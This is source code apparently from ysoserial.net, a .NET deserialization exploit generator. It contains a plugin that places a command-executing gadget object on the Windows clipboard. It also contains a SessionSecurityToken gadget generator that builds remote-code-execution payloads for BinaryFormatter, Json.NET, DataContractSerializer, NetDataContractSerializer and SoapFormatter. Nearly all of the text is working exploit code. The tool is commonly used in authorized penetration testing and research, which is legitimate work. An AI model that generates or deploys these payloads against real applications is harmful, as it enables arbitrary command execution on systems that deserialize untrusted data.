public object Run(string[] args) { // to solve this error: Current thread must be set to single thread apartment (STA) mode before OLE calls can be made // we cannot use the [STAThread] outside of this plugin // here is a solution var staThread = new Thread(delegate() { InputArgs inputArgs = new InputArgs(); List <string> extra; try { extra = options.Parse(args); inputArgs.Cmd = command; inputArgs.Minify = minify; inputArgs.UseSimpleType = useSimpleType; inputArgs.Test = test; } catch (OptionException e) { Console.Write("ysoserial: "); Console.WriteLine(e.Message); Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information."); System.Environment.Exit(-1); } object payload = ""; if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command)) { Console.Write("ysoserial: "); Console.WriteLine("Incorrect plugin mode/arguments combination"); Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information."); System.Environment.Exit(-1); } // Creates a new data object. System.Windows.Forms.DataObject myDataObject = new System.Windows.Forms.DataObject(); myDataObject.SetData(format, false, new AxHostStateMarshal(TextFormattingRunPropertiesGenerator.TextFormattingRunPropertiesGadget(inputArgs))); // for System.Windows.Forms /* * myDataObject.SetData(format, new DataSetMarshal(TextFormattingRunPropertiesGenerator.TextFormattingRunPropertiesGadget(inputArgs)), false); // for System.Windows */ Clipboard.Clear(); Clipboard.SetDataObject(myDataObject, true); if (test) { // PoC on how it works in practice try { IDataObject dataObj = Clipboard.GetDataObject(); Object test = dataObj.GetData(format); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } }); staThread.SetApartmentState(ApartmentState.STA); staThread.Start(); staThread.Join(); return("Object copied to the clipboard"); }
private void ClosePopup(object sender, InputArgs e) { Helpers.CloseThisMenu(sender); }
public override object Generate(string formatter, InputArgs inputArgs) { Generator generator = new TextFormattingRunPropertiesGenerator(); byte[] binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs); string b64encoded = Convert.ToBase64String(binaryFormatterPayload); if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) || formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase)) { var obj = new SessionSecurityTokenMarshal(b64encoded); return(Serialize(obj, formatter, inputArgs)); } else if (formatter.ToLower().Equals("json.net")) { string payload = "{'$type': 'System.IdentityModel.Tokens.SessionSecurityToken, System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', 'SessionToken':{'$type':'System.Byte[], mscorlib','$value':'" + GetB64SessionToken(b64encoded) + "'}}"; if (inputArgs.Minify) { payload = JSONMinifier.Minify(payload, new string[] { "System.IdentityModel" }, null); } if (inputArgs.Test) { try { SerializersHelper.JsonNet_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("datacontractserializer")) { string payload = $@"<root type=""System.IdentityModel.Tokens.SessionSecurityToken, System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""><SessionSecurityToken xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns=""http://schemas.datacontract.org/2004/07/System.IdentityModel.Tokens""> <SessionToken i:type=""x:base64Binary"" xmlns="""">{GetB64SessionToken(b64encoded)}</SessionToken> </SessionSecurityToken></root>"; if (inputArgs.Minify) { payload = XMLMinifier.Minify(payload, null, null); } if (inputArgs.Test) { try { SerializersHelper.DataContractSerializer_deserialize(payload, null, "root", "type"); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("netdatacontractserializer")) { string payload = $@"<w xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" z:Id=""1"" z:Type=""System.IdentityModel.Tokens.SessionSecurityToken"" z:Assembly=""System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns=""""> <SessionToken z:Type=""System.Byte[]"" z:Assembly=""0"" xmlns="""">{GetB64SessionToken(b64encoded)}</SessionToken> </w>"; if (inputArgs.Minify) { payload = XMLMinifier.Minify(payload, null, null); } if (inputArgs.Test) { try { SerializersHelper.NetDataContractSerializer_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("soapformatter")) { string payload = $@"<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""> <SOAP-ENV:Body> <a1:SessionSecurityToken id=""ref-1"" xmlns:a1=""http://schemas.microsoft.com/clr/nsassem/System.IdentityModel.Tokens/System.IdentityModel%2C%20Version%3D4.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3Db77a5c561934e089""> <SessionToken href=""#ref-3""/> </a1:SessionSecurityToken> <SOAP-ENC:Array id=""ref-3"" xsi:type=""SOAP-ENC:base64"">{GetB64SessionToken(b64encoded)}</SOAP-ENC:Array> </SOAP-ENV:Body> </SOAP-ENV:Envelope> "; if (inputArgs.Minify) { payload = XMLMinifier.Minify(payload, null, null, FormatterType.SoapFormatter); } if (inputArgs.Test) { try { SerializersHelper.SoapFormatter_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else { throw new Exception("Formatter not supported"); } }